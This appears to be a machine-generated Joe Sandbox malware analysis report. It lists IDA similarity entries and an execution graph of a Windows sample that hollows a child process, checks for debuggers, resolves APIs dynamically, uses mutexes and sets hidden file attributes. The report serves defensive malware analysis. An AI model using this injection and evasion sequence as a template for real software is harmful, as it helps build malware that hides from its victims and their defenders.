                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction ID: ccadc5ae1e4d148c23e63aa46b29db983f9d4581893cd197b74e9944b8133f08
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3801E121B0CA4185E730BF11E85C37AE772FB88B79F940531DA5E426A4DF3CD5968A50
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction ID: dee51165fecd690dceea9853f5996ffb85ba88ab2c8785ea7f01dd926de715e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92210C31B0C98689E770AF11E85C37AA362FBC4764F904634DA6E425E8EF2CD456CB50
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                  • Instruction ID: a8c4e3991dd1178dfa5d08428b724f67f2fc459b54bc644aa4afe6777e962a8a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE010022B1CA41C6E730BF11E81C23EE371FFC8B64FD00531EA9E426A4DE2CD5568A50
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction ID: 391f0b845684d512bf94d064b16fd3036cb3c998fba05e50fa2401085dfebd39
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F331C77261DAC089D770AF19E4987AAB3A1F7C8750F400525DB9D83B68EF3DD155CB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                                                  • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                  • Instruction ID: deaf8d56bfcbdeeea0d841af5e30ce8d1cf043b53379a9c5c4840ff16302d622
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F014C3661CA808ADB60AF14F44876AB774F7887A4F801225EB9D43BA8EF7CC155CF00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC4390D
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43922
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43935
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43945
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43958
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC4396D
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43980
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC438C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7CDC43AA9), ref: 00007FF7CDC43995
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC446E4: CreateFileW.KERNEL32 ref: 00007FF7CDC4472B
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC440E4: GetCurrentProcess.KERNEL32 ref: 00007FF7CDC4414B
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC440E4: OpenProcessToken.ADVAPI32 ref: 00007FF7CDC4415E
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC440E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7CDC44186
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC440E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7CDC441B1
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC440E4: CloseHandle.KERNEL32 ref: 00007FF7CDC441BC
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC440E4: OpenProcess.KERNEL32 ref: 00007FF7CDC441D1
                                                                                                                                                                                                    • Part of subcall function 00007FF7CDC440E4: CloseHandle.KERNEL32 ref: 00007FF7CDC44249
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF7CDC43037
                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF7CDC4304A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1325355643.00007FF7CDC41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7CDC40000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325269153.00007FF7CDC40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325462961.00007FF7CDC45000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325521531.00007FF7CDC47000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325600967.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1325705613.00007FF7CDC4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7cdc40000_mggoBrtk9t.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                  • API String ID: 3992431006-2286007224
                                                                                                                                                                                                  • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                  • Instruction ID: b3b67cddcedcbcd1e112dec8791a624e36ba396198720cb1aec5447a89793e6c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE11E930B1CA8289E630FF50F85D3B5B7A2FB84364F904535D66C426A5EF7CD0668BA0

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:38.6%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:481
                                                                                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                                                                                  execution_graph 1361 7ff68dea33ac 1364 7ff68dea2048 GetModuleFileNameW 1361->1364 1365 7ff68dea20c9 1364->1365 1371 7ff68dea20c4 1364->1371 1366 7ff68dea2107 1365->1366 1367 7ff68dea211d 1365->1367 1368 7ff68dea2111 1366->1368 1369 7ff68dea213b 1366->1369 1407 7ff68dea1f88 ExpandEnvironmentStringsW 1367->1407 1368->1371 1409 7ff68dea2008 ExpandEnvironmentStringsW 1368->1409 1408 7ff68dea1fc8 ExpandEnvironmentStringsW 1369->1408 1372 7ff68dea2132 1372->1371 1375 7ff68dea218d CreateProcessW 1372->1375 1375->1371 1376 7ff68dea21e8 CreateFileW 1375->1376 1376->1371 1377 7ff68dea222f GetFileSize 1376->1377 1378 7ff68dea2257 CloseHandle 1377->1378 1379 7ff68dea224d 1377->1379 1378->1371 1379->1378 1380 7ff68dea2267 VirtualAlloc 1379->1380 1381 7ff68dea22a1 ReadFile 1380->1381 1382 7ff68dea2291 CloseHandle 1380->1382 1383 7ff68dea22ce VirtualFree CloseHandle 1381->1383 1384 7ff68dea22f1 CloseHandle GetThreadContext 1381->1384 1382->1371 1383->1371 1385 7ff68dea2341 VirtualFree 1384->1385 1386 7ff68dea2359 ReadProcessMemory GetModuleHandleA GetProcAddress 1384->1386 1385->1371 1387 7ff68dea23dc 1386->1387 1388 7ff68dea23e0 VirtualFree 1387->1388 1389 7ff68dea23f8 VirtualAllocEx 1387->1389 1388->1371 1390 7ff68dea2463 VirtualFree 1389->1390 1391 7ff68dea247b WriteProcessMemory 1389->1391 1390->1371 1392 7ff68dea24b1 VirtualFree 1391->1392 1394 7ff68dea24c9 1391->1394 1392->1371 1393 7ff68dea24ff WriteProcessMemory 1393->1394 1395 7ff68dea258a VirtualFree 1393->1395 1394->1393 1398 7ff68dea25a7 1394->1398 1395->1371 1396 7ff68dea2619 RtlCompareMemory 1396->1398 1404 7ff68dea266c 1396->1404 1397 7ff68dea2898 WriteProcessMemory SetThreadContext 1399 7ff68dea291e VirtualFree 1397->1399 1400 7ff68dea2933 ResumeThread 1397->1400 1398->1396 1398->1397 1399->1371 1401 7ff68dea2945 VirtualFree 1400->1401 1402 7ff68dea295a VirtualFree 1400->1402 1401->1371 1402->1371 1403 7ff68dea2893 1403->1397 1404->1403 1405 7ff68dea279c ReadProcessMemory WriteProcessMemory 1404->1405 1405->1404 1406 7ff68dea2871 VirtualFree 1405->1406 1406->1371 1407->1372 1408->1372 1409->1372 1419 7ff68dea2f0c CreateMutexA 1420 7ff68dea2f4e GetLastError 1419->1420 1421 7ff68dea2f31 ReleaseMutex CloseHandle 1419->1421 1423 7ff68dea2f78 ReleaseMutex CloseHandle 1420->1423 1424 7ff68dea2f5b ReleaseMutex CloseHandle 1420->1424 1422 7ff68dea2f90 1421->1422 1423->1422 1424->1422 1425 7ff68dea338c 1426 7ff68dea2048 36 API calls 1425->1426 1427 7ff68dea339c 1426->1427 1428 7ff68dea31ec 1429 7ff68dea31f5 1428->1429 1430 7ff68dea320e 1429->1430 1433 7ff68dea306c 1429->1433 1438 7ff68dea2e6c CreateMutexA 1433->1438 1436 7ff68dea3087 Sleep CreateThread WaitForSingleObject 1437 7ff68dea30cc Sleep 1436->1437 1437->1429 1439 7ff68dea2eb5 GetLastError 1438->1439 1440 7ff68dea2e98 ReleaseMutex CloseHandle 1438->1440 1442 7ff68dea2edf ReleaseMutex CloseHandle 1439->1442 1443 7ff68dea2ec2 ReleaseMutex CloseHandle 1439->1443 1441 7ff68dea2ef7 1440->1441 1441->1436 1441->1437 1442->1441 1443->1441 837 7ff68dea345c 896 7ff68dea10a0 837->896 842 7ff68dea3474 ExitProcess 843 7ff68dea347c 1130 7ff68dea4264 GetCurrentProcess OpenProcessToken 843->1130 847 7ff68dea3497 848 7ff68dea34fb 847->848 849 7ff68dea34ac 847->849 852 7ff68dea3510 848->852 853 7ff68dea354c 848->853 1145 7ff68dea43a4 CreateMutexExA 849->1145 855 7ff68dea43a4 3 API calls 852->855 859 7ff68dea3561 853->859 860 7ff68dea35a2 853->860 854 7ff68dea34d2 ExitProcess 857 7ff68dea351c 855->857 856 7ff68dea43a4 3 API calls 858 7ff68dea34cb 856->858 861 7ff68dea3523 ExitProcess 857->861 862 7ff68dea352b 857->862 858->854 863 7ff68dea34da 858->863 864 7ff68dea43a4 3 API calls 859->864 1163 7ff68dea3a74 860->1163 1158 7ff68dea327c 862->1158 1149 7ff68dea32ec 863->1149 869 7ff68dea356d 864->869 868 7ff68dea34df 872 7ff68dea34f3 ExitProcess 868->872 873 7ff68dea34e6 Sleep 868->873 874 7ff68dea3574 ExitProcess 869->874 875 7ff68dea357c 869->875 870 7ff68dea3530 876 7ff68dea3544 ExitProcess 870->876 877 7ff68dea3537 Sleep 870->877 873->868 879 7ff68dea327c 20 API calls 875->879 877->870 883 7ff68dea3581 879->883 881 7ff68dea360e 7 API calls 882 7ff68dea35ba 884 7ff68dea43a4 3 API calls 882->884 885 7ff68dea3595 ExitProcess 883->885 886 7ff68dea3588 Sleep 883->886 887 7ff68dea35c6 884->887 886->883 888 7ff68dea35e0 ExitProcess 887->888 889 7ff68dea43a4 3 API calls 887->889 890 7ff68dea35d9 889->890 890->888 891 7ff68dea35e8 890->891 892 7ff68dea32ec 47 API calls 891->892 893 7ff68dea35ed 892->893 894 7ff68dea3601 ExitProcess 893->894 895 7ff68dea35f4 Sleep 893->895 895->893 1173 7ff68dea1000 LoadLibraryA GetProcAddress 896->1173 898 7ff68dea113a 1174 7ff68dea1000 LoadLibraryA GetProcAddress 898->1174 900 7ff68dea1154 1175 7ff68dea1050 LoadLibraryA GetProcAddress 900->1175 902 7ff68dea116e 1176 7ff68dea1050 LoadLibraryA GetProcAddress 902->1176 904 7ff68dea1188 1177 7ff68dea1050 LoadLibraryA GetProcAddress 904->1177 906 7ff68dea11a2 1178 7ff68dea1050 LoadLibraryA GetProcAddress 906->1178 908 7ff68dea11bc 1179 7ff68dea1050 LoadLibraryA GetProcAddress 908->1179 910 7ff68dea11d6 1180 7ff68dea1050 LoadLibraryA GetProcAddress 910->1180 912 7ff68dea11f0 1181 7ff68dea1050 LoadLibraryA GetProcAddress 912->1181 914 7ff68dea120a 1182 7ff68dea1050 LoadLibraryA GetProcAddress 914->1182 916 7ff68dea1224 1183 7ff68dea1050 LoadLibraryA GetProcAddress 916->1183 918 7ff68dea123e 1184 7ff68dea1000 LoadLibraryA GetProcAddress 918->1184 920 7ff68dea1258 1185 7ff68dea1000 LoadLibraryA GetProcAddress 920->1185 922 7ff68dea1272 1186 7ff68dea1000 LoadLibraryA GetProcAddress 922->1186 924 7ff68dea128c 1187 7ff68dea1000 LoadLibraryA GetProcAddress 924->1187 926 7ff68dea12a6 1188 7ff68dea1050 LoadLibraryA GetProcAddress 926->1188 928 7ff68dea12c0 1189 7ff68dea1050 LoadLibraryA GetProcAddress 928->1189 930 7ff68dea12da 1190 7ff68dea1050 LoadLibraryA GetProcAddress 930->1190 932 7ff68dea12f4 1191 7ff68dea1050 LoadLibraryA GetProcAddress 932->1191 934 7ff68dea130e 1192 7ff68dea1050 LoadLibraryA GetProcAddress 934->1192 936 7ff68dea1328 1193 7ff68dea1050 LoadLibraryA GetProcAddress 936->1193 938 7ff68dea1342 1194 7ff68dea1050 LoadLibraryA GetProcAddress 938->1194 940 7ff68dea135c 1195 7ff68dea1050 LoadLibraryA GetProcAddress 940->1195 942 7ff68dea1376 1196 7ff68dea1050 LoadLibraryA GetProcAddress 942->1196 944 7ff68dea1390 1197 7ff68dea1050 LoadLibraryA GetProcAddress 944->1197 946 7ff68dea13aa 1198 7ff68dea1050 LoadLibraryA GetProcAddress 946->1198 948 7ff68dea13c4 1199 7ff68dea1050 LoadLibraryA GetProcAddress 948->1199 950 7ff68dea13de 1200 7ff68dea1050 LoadLibraryA GetProcAddress 950->1200 952 7ff68dea13f8 1201 7ff68dea1050 LoadLibraryA GetProcAddress 952->1201 954 7ff68dea1412 1202 7ff68dea1050 LoadLibraryA GetProcAddress 954->1202 956 7ff68dea142c 1203 7ff68dea1050 LoadLibraryA GetProcAddress 956->1203 958 7ff68dea1446 1204 7ff68dea1050 LoadLibraryA GetProcAddress 958->1204 960 7ff68dea1460 1205 7ff68dea1050 LoadLibraryA GetProcAddress 960->1205 962 7ff68dea147a 1206 7ff68dea1050 LoadLibraryA GetProcAddress 962->1206 964 7ff68dea1494 1207 7ff68dea1050 LoadLibraryA GetProcAddress 964->1207 966 7ff68dea14ae 1208 7ff68dea1050 LoadLibraryA GetProcAddress 966->1208 968 7ff68dea14c8 1209 7ff68dea1050 LoadLibraryA GetProcAddress 968->1209 970 7ff68dea14e2 1210 7ff68dea1050 LoadLibraryA GetProcAddress 970->1210 972 7ff68dea14fc 1211 7ff68dea1050 LoadLibraryA GetProcAddress 972->1211 974 7ff68dea1516 1212 7ff68dea1050 LoadLibraryA GetProcAddress 974->1212 976 7ff68dea1530 1213 7ff68dea1050 LoadLibraryA GetProcAddress 976->1213 978 7ff68dea154a 1214 7ff68dea1050 LoadLibraryA GetProcAddress 978->1214 980 7ff68dea1564 1215 7ff68dea1050 LoadLibraryA GetProcAddress 980->1215 982 7ff68dea157e 1216 7ff68dea1050 LoadLibraryA GetProcAddress 982->1216 984 7ff68dea1598 1217 7ff68dea1050 LoadLibraryA GetProcAddress 984->1217 986 7ff68dea15b2 1218 7ff68dea1050 LoadLibraryA GetProcAddress 986->1218 988 7ff68dea15cc 1219 7ff68dea1050 LoadLibraryA GetProcAddress 988->1219 990 7ff68dea15e6 1220 7ff68dea1050 LoadLibraryA GetProcAddress 990->1220 992 7ff68dea1600 1221 7ff68dea1050 LoadLibraryA GetProcAddress 992->1221 994 7ff68dea161a 1222 7ff68dea1050 LoadLibraryA GetProcAddress 994->1222 996 7ff68dea1634 1223 7ff68dea1050 LoadLibraryA GetProcAddress 996->1223 998 7ff68dea164e 1224 7ff68dea1050 LoadLibraryA GetProcAddress 998->1224 1000 7ff68dea1668 1225 7ff68dea1050 LoadLibraryA GetProcAddress 1000->1225 1002 7ff68dea1682 1226 7ff68dea1050 LoadLibraryA GetProcAddress 1002->1226 1004 7ff68dea169c 1227 7ff68dea1050 LoadLibraryA GetProcAddress 1004->1227 1006 7ff68dea16b6 1228 7ff68dea1050 LoadLibraryA GetProcAddress 1006->1228 1008 7ff68dea16d0 1229 7ff68dea1050 LoadLibraryA GetProcAddress 1008->1229 1010 7ff68dea16ea 1230 7ff68dea1050 LoadLibraryA GetProcAddress 1010->1230 1012 7ff68dea1704 1231 7ff68dea1050 LoadLibraryA GetProcAddress 1012->1231 1014 7ff68dea171e 1232 7ff68dea1050 LoadLibraryA GetProcAddress 1014->1232 1016 7ff68dea1738 1233 7ff68dea1050 LoadLibraryA GetProcAddress 1016->1233 1018 7ff68dea1752 1234 7ff68dea1050 LoadLibraryA GetProcAddress 1018->1234 1020 7ff68dea176c 1235 7ff68dea1050 LoadLibraryA GetProcAddress 1020->1235 1022 7ff68dea1786 1236 7ff68dea1050 LoadLibraryA GetProcAddress 1022->1236 1024 7ff68dea17a0 1237 7ff68dea1050 LoadLibraryA GetProcAddress 1024->1237 1026 7ff68dea17ba 1238 7ff68dea1050 LoadLibraryA GetProcAddress 1026->1238 1028 7ff68dea17d4 1239 7ff68dea1050 LoadLibraryA GetProcAddress 1028->1239 1030 7ff68dea17ee 1240 7ff68dea1050 LoadLibraryA GetProcAddress 1030->1240 1032 7ff68dea1808 1241 7ff68dea1050 LoadLibraryA GetProcAddress 1032->1241 1034 7ff68dea1822 1242 7ff68dea1050 LoadLibraryA GetProcAddress 1034->1242 1036 7ff68dea183c 1243 7ff68dea1050 LoadLibraryA GetProcAddress 1036->1243 1038 7ff68dea1856 1244 7ff68dea1050 LoadLibraryA GetProcAddress 1038->1244 1040 7ff68dea1870 1245 7ff68dea1050 LoadLibraryA GetProcAddress 1040->1245 1042 7ff68dea188a 1246 7ff68dea1050 LoadLibraryA GetProcAddress 1042->1246 1044 7ff68dea18a4 1247 7ff68dea1050 LoadLibraryA GetProcAddress 1044->1247 1046 7ff68dea18be 1248 7ff68dea1050 LoadLibraryA GetProcAddress 1046->1248 1048 7ff68dea18d8 1249 7ff68dea1050 LoadLibraryA GetProcAddress 1048->1249 1050 7ff68dea18f2 1250 7ff68dea1050 LoadLibraryA GetProcAddress 1050->1250 1052 7ff68dea190c 1251 7ff68dea1050 LoadLibraryA GetProcAddress 1052->1251 1054 7ff68dea1926 1252 7ff68dea1050 LoadLibraryA GetProcAddress 1054->1252 1056 7ff68dea1940 1253 7ff68dea1050 LoadLibraryA GetProcAddress 1056->1253 1058 7ff68dea195a 1254 7ff68dea1050 LoadLibraryA GetProcAddress 1058->1254 1060 7ff68dea1974 1255 7ff68dea1050 LoadLibraryA GetProcAddress 1060->1255 1062 7ff68dea198e 1256 7ff68dea1050 LoadLibraryA GetProcAddress 1062->1256 1064 7ff68dea19a8 1257 7ff68dea1050 LoadLibraryA GetProcAddress 1064->1257 1066 7ff68dea19c2 1258 7ff68dea1050 LoadLibraryA GetProcAddress 1066->1258 1068 7ff68dea19dc 1259 7ff68dea1050 LoadLibraryA GetProcAddress 1068->1259 1070 7ff68dea19f6 1260 7ff68dea1050 LoadLibraryA GetProcAddress 1070->1260 1072 7ff68dea1a10 1261 7ff68dea1050 LoadLibraryA GetProcAddress 1072->1261 1074 7ff68dea1a2a 1262 7ff68dea1050 LoadLibraryA GetProcAddress 1074->1262 1076 7ff68dea1a44 1263 7ff68dea1050 LoadLibraryA GetProcAddress 1076->1263 1078 7ff68dea1a5e 1264 7ff68dea1050 LoadLibraryA GetProcAddress 1078->1264 1080 7ff68dea1a78 1265 7ff68dea1050 LoadLibraryA GetProcAddress 1080->1265 1082 7ff68dea1a92 1266 7ff68dea1050 LoadLibraryA GetProcAddress 1082->1266 1084 7ff68dea1aac 1267 7ff68dea1050 LoadLibraryA GetProcAddress 1084->1267 1086 7ff68dea1ac6 1268 7ff68dea1050 LoadLibraryA GetProcAddress 1086->1268 1088 7ff68dea1ae0 1269 7ff68dea1050 LoadLibraryA GetProcAddress 1088->1269 1090 7ff68dea1afa 1270 7ff68dea1050 LoadLibraryA GetProcAddress 1090->1270 1092 7ff68dea1b14 1271 7ff68dea1050 LoadLibraryA GetProcAddress 1092->1271 1094 7ff68dea1b2e 1272 7ff68dea1000 LoadLibraryA GetProcAddress 1094->1272 1096 7ff68dea1b48 1273 7ff68dea1050 LoadLibraryA GetProcAddress 1096->1273 1098 7ff68dea1b62 1274 7ff68dea1050 LoadLibraryA GetProcAddress 1098->1274 1100 7ff68dea1b7c 1275 7ff68dea1050 LoadLibraryA GetProcAddress 1100->1275 1102 7ff68dea1b96 1276 7ff68dea1050 LoadLibraryA GetProcAddress 1102->1276 1104 7ff68dea1bb0 1277 7ff68dea1050 LoadLibraryA GetProcAddress 1104->1277 1106 7ff68dea1bca 1278 7ff68dea1050 LoadLibraryA GetProcAddress 1106->1278 1108 7ff68dea1be4 1279 7ff68dea1050 LoadLibraryA GetProcAddress 1108->1279 1110 7ff68dea1bfe 1280 7ff68dea1000 LoadLibraryA GetProcAddress 1110->1280 1112 7ff68dea1c18 1281 7ff68dea1000 LoadLibraryA GetProcAddress 1112->1281 1114 7ff68dea1c32 1282 7ff68dea1050 LoadLibraryA GetProcAddress 1114->1282 1116 7ff68dea1c4c 1283 7ff68dea1050 LoadLibraryA GetProcAddress 1116->1283 1118 7ff68dea1c66 1284 7ff68dea1050 LoadLibraryA GetProcAddress 1118->1284 1120 7ff68dea1c80 1285 7ff68dea1050 LoadLibraryA GetProcAddress 1120->1285 1122 7ff68dea1c9a 1286 7ff68dea1050 LoadLibraryA GetProcAddress 1122->1286 1124 7ff68dea1cb4 1287 7ff68dea1050 LoadLibraryA GetProcAddress 1124->1287 1126 7ff68dea1cce 1127 7ff68dea321c IsDebuggerPresent 1126->1127 1128 7ff68dea322e GetCurrentProcess CheckRemoteDebuggerPresent 1127->1128 1129 7ff68dea322a 1127->1129 1128->1129 1129->842 1129->843 1131 7ff68dea3481 1130->1131 1132 7ff68dea428a GetTokenInformation 1130->1132 1141 7ff68dea3ce4 GetModuleFileNameW 1131->1141 